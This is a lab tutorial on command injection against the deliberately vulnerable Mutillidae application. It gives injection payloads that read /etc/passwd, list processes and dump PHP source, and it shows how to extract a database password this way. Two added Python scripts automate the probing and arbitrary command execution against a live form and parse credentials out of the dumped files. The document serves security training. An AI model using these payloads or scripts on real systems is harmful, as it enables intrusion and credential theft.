Web Penetration Testing
Mutillidae Part 2: Command Injection Database Interrogation
What is Mutillidae?
Mutillidae is a free, open-source, deliberately vulnerable web application that provides a practice target for web security analysts. It contains the OWASP Top 10 vulnerabilities and is maintained as an OWASP project.
What is Command Injection?
Command injection is a web vulnerability that allows an attacker to run operating-system commands or server-side scripts through the web interface (the web application). It occurs when the application builds a command line from user input and hands it to the system shell, for example a page that runs nslookup, whois, ping or traceroute on a value the user types in. The vulnerability can be tested by fuzzing: the attacker appends a shell metacharacter such as ";", "|", "||", "&" or "&&" to the expected input, followed by a second command. If the output of that second command appears in the response, the input reached a shell unfiltered.
For example: [expected_input]; [command]
Pre-Requisite Web Penetration Testing Lab
1. Configured Mutillidae.
How To Setup Virtual Lab For Web Penetration Testing
Remote database access has been turned on.
2. Installed Kali Linux:
Strictly speaking Kali Linux is not necessary, but if you are a penetration tester you should use a Kali Linux virtual machine.
Configure the network interfaces of both machines (Fedora-Mutillidae and Kali Linux), start them, and check the connectivity between them.
How to install Kali Linux
Step 1: Access Mutillidae from the Kali Linux machine
Go to DNS Lookup
OWASP Top 10 -> A2 – Cross Site Scripting (XSS) -> Reflected (First Order) -> DNS Lookup
The DNS Lookup page does exactly what its name says: it runs the nslookup utility from the command line on the server and shows you the output.
Hostname/IP: www.cyberpedia.in
Click the Lookup DNS button and view your results.
Test DNS Lookup Vulnerability
To find the command execution vulnerability, enter the hostname followed by ";" and a command of your own. Appending ";" and a command after what the software expects is a simple form of fuzzing. Enter the following:
www.cyberpedia.in; uname -a
View your results. If the kernel and architecture line from uname appears under the nslookup output, the input reached the shell.
It is also useful to know which directory the web application is running from. On Linux the current working directory is shown by pwd. Follow the given instructions:
Enter Hostname/IP: www.cyberpedia.in; pwd
Click the Lookup DNS button and view your results.
Interrogate the dns-lookup.php application
The input the attacker submits is executed by dns-lookup.php. Let's see whether we can find the line of code where PHP makes the system call. In the commands that follow, "hostname" stands for the hostname you entered above (for example www.cyberpedia.in); the rest of the line is what runs on the server. Follow these instructions:
hostname; find /var/www/html/mutillidae -name "dns-lookup.php" | xargs egrep '(exec|system|virtual)'
Click the Lookup DNS button and analyze your results.
The results show that the nslookup command is executed by the PHP function shell_exec(), which passes its argument to the system shell.
Enter the following syntax:
- hostname; cat /etc/passwd | egrep -i '(postgres|sql|db2|ora)'
- This lists local accounts whose names hint at a database engine (postgres, mysql, db2, oracle). By using the "ps" command you can also discover the running database engine: it searches the process list for the same strings.
hostname; ps -eaf | egrep -i '(postgres|sql|db2|ora)'
In this step we will find out whether any PHP scripts under /var/www/html/mutillidae contain a database name and password. First list the PHP files, so you know which scripts to inspect. Enter the following into the text box and click the Lookup DNS button:
hostname; find /var/www/html/mutillidae -name "*.php"
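The fuzzing described above (appending ";", "|", "||", "&", "&&" or command substitution to the expected hostname, then checking whether the second command's output comes back) can be automated, and the same channel then carries the interrogation commands (pwd, uname -a, find, ps). The script below is an added example; it is not code from this page or from Mutillidae. The form field names (target_host, dns-lookup-php-submit-button) and the URL used by http_sender are assumptions to confirm in the browser's inspector, and the two *_lookup functions are constructed stand-ins for the server side so the probe can be exercised offline.

```python
"""Command-injection probe for a hostname lookup form such as Mutillidae's
DNS Lookup page.

Added example: not code from the page or from Mutillidae. The form field
names (target_host, dns-lookup-php-submit-button) and the lookup URL used by
http_sender are assumptions. The two *_lookup functions are constructed
stand-ins for the server side so that the probe runs offline.
"""
import html
import re
import secrets
import subprocess
from typing import Callable, List

# Tokens that end the argument the application expects and start a second
# command. "$()" and backticks are command substitution, which still fires
# when the separators themselves are filtered.
LABELS = [";", "|", "||", "&", "&&", "\n", "$()", "``"]
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def make_canary() -> str:
    """Random token; seeing it in a response proves that our echo ran."""
    return "cmdi" + secrets.token_hex(6)


def payload_for(expected: str, label: str, canary: str) -> str:
    """<expected input><separator> echo <canary>, or a substitution form."""
    if label == "$()":
        return f"{expected} $(echo {canary})"
    if label == "``":
        return f"{expected} `echo {canary}`"
    return f"{expected}{label} echo {canary}"


def is_injected(body: str, payload: str, canary: str) -> bool:
    """The page reflects the input, and each reflection carries one canary,
    so the canary must occur MORE often than the whole payload for the echo
    to have executed. A hardened app that prints the quoted input back
    therefore does not trigger a false positive."""
    return body.count(canary) > body.count(payload)


def probe(send: Callable[[str], str], expected: str) -> List[str]:
    """Submit every payload through send(value) -> response body and return
    the labels that executed a command."""
    hits = []
    for label in LABELS:
        canary = make_canary()
        payload = payload_for(expected, label, canary)
        if is_injected(send(payload), payload, canary):
            hits.append(label)
    return hits


def run_command(send: Callable[[str], str], expected: str, command: str,
                label: str = ";") -> str:
    """Once a separator works, run an arbitrary command (pwd, uname -a, ps,
    find ...) and return the text that follows the reflected input."""
    payload = f"{expected}{label} {command}"
    body = send(payload)
    tail = body.split(payload, 1)[1] if payload in body else body
    return html.unescape(re.sub(r"<[^>]+>", "\n", tail)).strip()


def http_sender(url: str, field: str = "target_host") -> Callable[[str], str]:
    """send() for a live target; field and button names are assumptions."""
    import requests  # third-party, only needed for the live case

    def send(value: str) -> str:
        data = {field: value, "dns-lookup-php-submit-button": "Lookup DNS"}
        return requests.post(url, data=data, timeout=10).text
    return send


def vulnerable_lookup(value: str) -> str:
    """Constructed stand-in for shell_exec("nslookup " . $host): the value is
    pasted into a shell command line. nslookup is replaced by echo so that
    this runs offline without DNS."""
    out = subprocess.run("echo lookup-stub " + value, shell=True,
                         capture_output=True, text=True, timeout=5).stdout
    return f"Results for {value}<br>{out}"


def hardened_lookup(value: str) -> str:
    """Constructed fix: allow-list the hostname, then pass it as one argv
    element with no shell at all (validation plus escapeshellarg() in PHP)."""
    if not HOSTNAME_RE.match(value):
        return "Invalid hostname"
    out = subprocess.run(["echo", "lookup-stub", value],
                         capture_output=True, text=True, timeout=5).stdout
    return f"Results for {html.escape(value)}<br>{out}"


if __name__ == "__main__":
    print("vulnerable:", probe(vulnerable_lookup, "www.cyberpedia.in"))
    print("hardened:  ", probe(hardened_lookup, "www.cyberpedia.in"))
    print(run_command(vulnerable_lookup, "www.cyberpedia.in", "uname -a"))
```

Against a live lab, replace vulnerable_lookup with http_sender("http://<mutillidae>/index.php?page=dns-lookup.php"). Note that "||" only runs the second command when the first one fails, so a miss on that separator while the lookup succeeds is expected and does not mean the page is safe.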
Find the password in the PHP scripts:
Obtain the password from the results:
Look for the string "password" in the database handler script. The actual line is
$mMySQLDatabasePassword = "toor";
Search for "user" or "login" in MySQLHandler.php
As we now know that the database password is inside MySQLHandler.php, the following command is used to obtain the user name or login from the same file:
hostname; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs egrep -i '(user|login)' | grep "="
I could have shown you this first, but good things come to those who wait.
It is possible to display the whole content of MySQLHandler.php by encoding the "<?php" and "?>" tags. When the file is dumped into the response as-is, the browser parses these tags as markup and hides the PHP source instead of showing it. To get around this and simply display the script, we change "<" to "&lt;" and ">" to "&gt;" with sed before the output reaches the page (the "&" must be escaped in the sed replacement, since a bare "&" stands for the matched text):
hostname; find /var/www/html/mutillidae -name "MySQLHandler.php" | xargs cat | sed 's/</\&lt;/g' | sed 's/>/\&gt;/g'
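Once the handler script comes back HTML-encoded, the credential lines still have to be decoded and picked out of the rest of the file, which is what the grep for "user", "login" and "password" does by hand above. The script below is an added example, not code from this page or from Mutillidae: it undoes the "&lt;"/"&gt;" encoding and extracts every quoted PHP assignment whose variable name looks like a credential. The sample file contents are constructed; only the password value "toor" and the variable name $mMySQLDatabasePassword come from the page, the other variable names are assumed.

```python
"""Recover database credentials from a PHP file dumped through the DNS
Lookup page. Added example, not from the page or Mutillidae. ENCODED_DUMP is
a constructed sample: only "toor" and $mMySQLDatabasePassword come from the
page; the other names and values are assumed.
"""
import html
import re
from typing import Dict

# What the browser received after sed turned "<" into "&lt;" and ">" into
# "&gt;". Constructed sample, not the real MySQLHandler.php.
ENCODED_DUMP = """&lt;?php
class MySQLHandler {
    private $mMySQLDatabaseHost = "localhost";
    private $mMySQLDatabaseUsername = "dbuser";
    private $mMySQLDatabasePassword = "toor";
    private $mMySQLDatabaseName = "mutillidae";
    private $mLogMessage = "connection failed";
    private $mTitle = 'DNS Lookup';
}
?&gt;"""

# $name = "value";  or  $name = 'value';  (quote style must match on both ends)
ASSIGN_RE = re.compile(r"""\$(\w+)\s*=\s*(["'])(.*?)\2\s*;""")
# Variable names worth reporting; "login" also catches $mLoginName-style names.
INTERESTING = re.compile(r"(user|login|pass|host|database|dbname|db_)", re.I)


def decode_dump(encoded: str) -> str:
    """Reverse the HTML entity encoding so the PHP source is readable again."""
    return html.unescape(encoded)


def extract_credentials(php_source: str) -> Dict[str, str]:
    """Map variable name -> literal value for every credential-looking
    string assignment in the decoded source."""
    creds = {}
    for name, _quote, value in ASSIGN_RE.findall(php_source):
        if INTERESTING.search(name):
            creds[name] = value
    return creds


def report(creds: Dict[str, str]) -> str:
    """One line per finding, with the password masked for the write-up."""
    lines = []
    for name, value in sorted(creds.items()):
        shown = value[0] + "*" * (len(value) - 1) if "pass" in name.lower() else value
        lines.append(f"{name} = {shown}")
    return "\n".join(lines)


if __name__ == "__main__":
    found = extract_credentials(decode_dump(ENCODED_DUMP))
    print(report(found))
```

The same two functions work on the output of the find | xargs cat | sed pipeline from the page once it has been copied out of the response, and on any other PHP configuration file reached the same way.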